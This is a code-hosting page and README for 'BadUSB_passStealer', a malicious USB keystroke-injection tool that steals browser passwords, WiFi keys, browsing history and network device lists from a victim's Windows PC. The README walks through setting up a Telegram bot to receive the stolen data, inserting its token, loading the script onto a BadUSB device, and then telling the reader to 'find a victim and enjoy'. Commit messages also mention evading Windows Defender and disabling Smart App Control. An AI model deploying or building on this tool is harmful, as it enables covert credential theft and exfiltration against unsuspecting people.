This script allows you to steal some informations from a computer.
  • PowerShell 100%
Find a file
Repository files (latest commit first)
Filename Latest commit message Latest commit date
2026-09-06 04:29:04 +02:00
other_files Add files via upload 2025-02-08 19:08:11 +01:00
BadUSB_passStealer.txt fix: add default delay after first run command to avoid action overlapping 2026-09-06 04:29:04 +02:00
LICENSE Add files via upload 2022-03-07 21:41:50 +01:00
ps.ps1 feat: avoid windows defender 2026-09-06 04:21:10 +02:00
README.md feat: argument based ps1 script and disable Smart App Control to avoid problems with WebBrowsrPassView.exe 2026-09-06 02:59:45 +02:00

💀 BadUSB_passStealer

⚠️ Warning

Everything in this repository is strictly for educational purposes. I am not responsible for any stolen data. You are responsible for your actions when using this script for BadUSB.

About

This script allows you to steal the following information: 🔹 Browser passwords (Chrome, Firefox, Opera) 🔹 WiFi passwords 🔹 Browser history from the last 7 days 🔹 A list of all devices connected to the victim's network

🔑 Key Information for Users

⚠️ MalDuino & Rubber Ducky Users

You must replace CTRL-SHIFT ENTER with CTRL SHIFT ENTER in the BadUSB_passStealer.txt file.

Flipper Zero users, no changes are needed—this syntax is already compatible.

⚠️ Arduino Users

🚫 I stopped upgrading .ino scripts. If you need them, you can convert Ducky Scripts here.

🕒 Adjusting Delay

You can customize the delays based on the speed of the target machine.

Waiting for Execution

When you plug the BadUSB into a PC, wait for the Caps Lock to flash before unplugging it.


🚀 Getting Started

📌 Requirements

✔️ A BadUSB ✔️ Install Arduino software here (if using an Arduino-based BadUSB) ✔️ A Telegram account ✔️ A victim using Windows 10/11


🤖 Setting up a Telegram Bot for Uploading Files

1 Create a Telegram Bot

1 Open Telegram Web and log in. 2 Search for @BotFather in the Telegram search bar. 3 Click Start to begin a conversation. 4 Send /newbot. 5 Choose a bot name and send it. 6 Choose a bot username and send it. 7 @BotFather will provide an API token:

Done! Congratulations on your new bot. You will find it at t.me/BOT_USERNAME. You can now add a description, about section, and profile picture for your bot. See /help for a list of commands. Use this token to access the HTTP API: API_ACCESS_TOKEN For a description of the Bot API, see this page: https://core.telegram.org/bots/api

8 Start a chat with your bot by clicking t.me/BOT_USERNAME and pressing Start.

2 Get Your Telegram API Token

Your API token is provided in @BotFather's response.

3 Get Your Telegram Chat ID

1 Open your browser and replace API_ACCESS_TOKEN in this URL:

https://api.telegram.org/bot<API_ACCESS_TOKEN>/getUpdates?offset=0

2 Send a test message to your bot on Telegram. 3 Refresh the API page. 4 Find your chat ID in the response JSON. Example:

"chat":{"id":123456789,"type":"private"}

Your chat ID is 123456789.


⚙️ Installation for Rubber Ducky, Malduino W, and Flipper Zero

1 Download this repository

🔹 Linux:

git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer
cd BadUSB_passStealer

🔹 Windows:

  • Click the green "Code" button at the top right.
  • Click "Download ZIP" and extract it.

2 Replace TOKEN and CHAT_ID in BadUSB_passStealer.txt.

5 Place the .txt file in your BadUSB.

6 Find a victim and enjoy! 🎭


🛠️ NirSoft Tools

🔗 You can download NirSoft tools here:

🔹 WebBrowserPassView.exe (User: download | Password: nirsoft123!) 🔹 WNetWatcher.exe 🔹 BrowsingHistoryView.exe 🔹 WirelessKeyView.exe